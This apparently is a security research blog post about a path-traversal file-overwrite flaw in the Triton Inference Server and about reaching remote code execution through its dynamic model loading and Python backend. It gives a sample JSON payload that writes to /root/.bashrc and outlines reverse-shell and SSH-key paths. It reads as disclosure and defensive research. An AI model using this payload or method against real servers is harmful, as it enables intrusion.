Read more below.
Inference servers are essential tools in making trained machine learning models accessible for practical use. These servers act as a bridge between the machine learning models and their end-users. Here’s how they fit into the machine learning lifecycle:
From a security perspective, inference servers are often the most exposed elements in a machine learning pipeline. Due to the exposure and direct access to the machine learning models, they are valuable targets for attackers.
One of the most popular inference servers in the world is the open source Triton Inference Server. It is optimized for cloud and edge deployments, and is offered by all major cloud providers as a standard way of deploying machine learning models to end-users.
On September 20th, 2023 a member of the huntr community, l1k3beef, reported an issue in Triton where a file traversal vulnerability lead to the ability to overwrite any file on the server when Triton is run using a non-default configuration option.
While the initial proof of concept in the report was failing, we felt it fit the pattern of vulnerabilities we’ve found and seen in the past. After some further experimentation we, at Protect AI, were able to trigger the reported vulnerability with some minor changes to the original proof of concept from l1k3beef.
Arbitrary file overwrites can often lead to remote code execution allowing attackers to completely control the server. Code execution can be acquired through arbitrary file overwrites through paths such as overwriting the SSH keys with the attacker’s keys, or overwriting the .bashrc file with malicious code that will execute the next time a user logs into the system. These kinds of exploitation paths require an extra step such as having an SSH server running.
The Triton Inference Server exposes both HTTP/REST and GRPC API endpoints based on KFServing standard inference protocols that have been proposed by the KFServing project. Triton also implements a number of HTTP/REST and GRPC extensions to the KFServing inference protocol. The HTTP/REST and GRPC protocols provide endpoints to check server and model health, metadata and statistics. Additional endpoints allow model loading/unloading, and inference.
The discovered vulnerability lies in the API of one of these extensions, specifically the Model Repository Extension. When Triton is started with Dynamic Model Loading enabled via the non-default --model-control-mode explicit
CLI argument, Triton becomes vulnerable to an arbitrary file overwrite attack. Prior to version 2.40 (NGC container 23.11), an attacker could craft an HTTP POST request to /v2/repository/models/<model_name>/load and payload the file
: JSON key with a path traversal such as the one seen below.
{
"parameters": {
"config": "{}",
"file:../../root/.bashrc": "BASE64_ENCODED_FILE_CONTENTS" }
File overwrite primitives are powerful vulnerabilities. In the context of Triton, one can silently replace running models with slightly different ones, or simply bring down the entire service by overwriting system files. Remote code execution is also possible by overwriting a user’s .profile
or .bashrc
files with, for example, a Python reverse shell which would execute the next time a user logs into the system.
Protect AI’s Threat Research team wanted to see if it was possible to turn this file write primitive into a direct remote code execution vulnerability, without the requirement of a user to log into the system to trigger the malicious code. Initially, the plan was to use this vulnerability to write a pickle model to the server that had malicious code injected into it then load the model triggering the code execution. However, after some research it was found Triton has the concept of backends:
“A Triton backend is the implementation that executes a model. A backend can be a wrapper around a deep-learning framework, like PyTorch, TensorFlow, TensorRT or ONNX Runtime. Or a backend can be custom C/C++ logic performing any operation (for example, image pre-processing)... ”1
The Python backend caught our attention:
“The Python backend allows you to write your model logic in Python. For example, you can use this backend to execute pre/post processing code written in Python …”
It dawned on us that we could potentially use this feature to get RCE by using the arbitrary file write vulnerability:
To tell Triton what backend to use for a specific model, all you have to do is specify it in the model’s config file (config.pbtxt). Below is an example model config file using the Python backend:
name: "mymodel"
backend: "python"
input [
{
name: "input__0"
data_type: TYPE_FP32
dims: [ -1, 3 ]
}
]
...SNIP...
With the Python backend, your “model” is simply a Python file which has to contain a class named TritonPythonModel, with three specific methods:
https://github.com/triton-inference-server/backend
Python
class TritonPythonModel:
def initialize(self, args):
# Your code here
return
def execute(self, requests):
# Your code here
return
def finalize(self):
# Your code here
return
By putting some code under the initialize
method to execute an operating system command, and instructing Triton to load the model, we can achieve remote code execution.
While we searched for the easiest way to turn the file overwrite into direct remote code execution without user interaction we realized that creating a model.py file with malicious code didn’t require the file overwrite vulnerability at all. When –-model-mode explicit
is used in Triton the load
endpoint itself is capable of remotely uploading a malicious model by design. With that in mind, Protect AI’s threat research team created a Metasploit module to help security professionals test their Triton deployment. It gives the user two options to acquire a remote shell.
First, a fileless in-memory remote shell is available with the module’s default options via the builtin functionality of the load
endpoint that is exposed when Triton is started with the argument –-model-mode explicit
. This method of acquiring a shell works with the latest version of Triton, as of the time of writing, because it abuses a feature of Triton rather than a vulnerability.
Second, the module contains an option for the user to store their payload to disk by utilizing the file overwrite vulnerability. This method of acquiring a shell was patched in the latest version of Triton: 23.12.
Proof of concept code to test your own Triton deployments for the vulnerability are available in a GitHub repository managed by ProtectAI.
The Triton Inference Server maintainers were quick to respond and fix the file overwrite vulnerability. A Secure Deployment Guide was written to inform users of the inherent risks in using the --model-control-mode explicit argument. Additionally, a Security Bulletin was posted informing users of the issues outlined above.